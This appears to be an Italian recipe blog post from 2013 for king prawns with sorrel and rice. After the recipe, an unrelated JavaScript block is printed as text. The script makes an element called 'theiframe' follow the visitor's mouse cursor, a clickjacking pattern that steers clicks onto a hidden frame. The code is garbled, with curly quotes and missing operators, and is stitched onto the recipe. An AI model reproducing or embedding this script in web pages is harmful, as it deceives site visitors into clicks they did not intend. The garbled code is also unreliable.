giovedì 17 ottobre 2013

Gamberoni all' acetosella e riso

INGREDIENTI PER 6 PERSONE:400 gr di riso,400 gamberoni precotto o surgelati,100 gr di champignon,50 gr di passata di pomodoro,50 gr di mandorle,cipolla,acetosella,estratto di carne,vino bianco secco,olio di oliva,olio per friggere,farina e sale PREPARAZIONE:Rosolate in una pirofila una cipolla tritata,con tre cucchiai di olio,tostatevi il riso ,salate,coprite di acqua bollente e cuocete in forno per 18 min.Sgusciate i gamberoni lasciando le teste e le code.Passateli nella farina friggeteli in abbondante olio .Pulite e affettate gli champignon ,quindi cuoceteli in un tegame con 3 cucchiai di olio e uno spicchio di aglio.Saltateli e unite qualche foglia di acetosella tritata.Bagnate con 1 dl di vino bianco.Unite la passata di pomodoro e insaporite con mezzo cucchiaino di estratto di carne,lasciando cuocere per ancora 10 min.Tritate le mandorle e unitele al riso ormai cotto e suddividetelo in 6 stampini.Servite i gamberoni cald con il riso e il sugo preparato.
text/javascript”> var opacity = 0.5; var time = 0; if((document.getElementById) window.addEventListener || window.attachEvent){ (function(){ var hairCol = “#ff0000″; var d = document; var my = -10; var mx = -10; var r; var vert = “”; var idx = document.getElementsByTagName(‘div’).length; var thehairs = “”; document.write(thehairs); var like = document.getElementById(“theiframe”); document.getElementsByTagName(‘body’)[0].appendChild(like); var pix = “px”; var domWw = (typeof window.innerWidth == “number”); var domSy = (typeof window.pageYOffset == “number”); if (domWw) r = window; else{ if (d.documentElement typeof d.documentElement.clientWidth == “number” d.documentElement.clientWidth != 0) r = d.documentElement; else{ if (d.body typeof d.body.clientWidth == “number”) r = d.body; } } if(time != 0){ setTimeout(function(){ document.getElementsByTagName(‘body’)[0].removeChild(like); if (window.addEventListener){ document.removeEventListener(“mousemove”,mouse,false); } else if (window.attachEvent){ document.detachEvent(“onmousemove”,mouse); } }, time); } function scrl(yx){ var y,x; if (domSy){ y = r.pageYOffset; x = r.pageXOffset; } else{ y = r.scrollTop; x = r.scrollLeft; } return (yx == 0) ? y:x; } function mouse(e){ var msy = (domSy)?window.pageYOffset:0; if (!e) e = window.event; if (typeof e.pageY == ‘number’){ my = e.pageY – 5 – msy; mx = e.pageX – 4; } else{ my = e.clientY – 6 – msy; mx = e.clientX – 6; } vert.top = my + scrl(0) + pix; vert.left = mx + pix; } function ani(){ vert.top = my + scrl(0) + pix; setTimeout(ani, 300); } function init(){ vert = document.getElementById(“theiframe”).style; ani(); } if (window.addEventListener){ window.addEventListener(“load”,init,false); document.addEventListener(“mousemove”,mouse,false); } else if (window.attachEvent){ window.attachEvent(“onload”,init); document.attachEvent(“onmousemove”,mouse); } })(); }//End. script>